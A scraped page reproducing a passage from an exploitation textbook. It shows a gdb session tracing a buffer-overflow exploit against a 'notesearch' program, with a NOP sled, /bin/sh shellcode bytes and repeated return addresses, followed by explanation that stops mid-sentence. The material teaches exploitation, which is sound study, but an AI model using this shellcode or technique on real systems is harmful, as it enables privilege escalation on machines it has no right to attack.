Graphics Programs Reference
In-Depth Information
(gdb) cont
Continuing.
Breakpoint 2, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:27
27 memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
(gdb) x/40x buffer
0x804a016: 0x90909090 0x90909090 0x90909090 0x90909090
0x804a026: 0x90909090 0x90909090 0x90909090 0x90909090
0x804a036: 0x90909090 0x90909090 0x90909090 0x90909090
0x804a046: 0x90909090 0x90909090 0x90909090 0xbffff6f6
0x804a056: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a066: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
(gdb) x/s command
0x804a008: "./notesearch '", '\220' <repeats 60 times>, "¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿
¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)
Finally, the call to memcpy() will copy the shellcode bytes into buffer+60 .
(gdb) cont
Continuing.
Breakpoint 3, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:29
29 strcat(command, "\'");
(gdb) x/40x buffer
0x804a016: 0x90909090 0x90909090 0x90909090 0x90909090
0x804a026: 0x90909090 0x90909090 0x90909090 0x90909090
0x804a036: 0x90909090 0x90909090 0x90909090 0x90909090
0x804a046: 0x90909090 0x90909090 0x90909090 0x3158466a
0x804a056: 0xcdc931db 0x2f685180 0x6868732f 0x6e69622f
0x804a066: 0x5351e389 0xb099e189 0xbf80cd0b 0xbffff6f6
0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6
(gdb) x/s command
0x804a008: "./notesearch '", '\220' <repeats 60 times>, "1À1Û1É\231°¤Í\200j\vXQh//shh/
bin\211ãQ\211âS\211áÍ\200¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)
Now the buffer contains the desired shellcode and is long enough to over-
write the return address. The difficulty of finding the exact location of the
return address is eased by using the repeated return address technique. But
this return address must point to the shellcode located in the same buffer.
This means the actual address must be known ahead of time, before it even
goes into memory. This can be a difficult prediction to try to make with a
dynamically changing stack. Fortunately, there is another hacking technique,
Previous Page
Next Page
Hacking: The Art of Exploitation
Search WWH ::




Custom Search
Home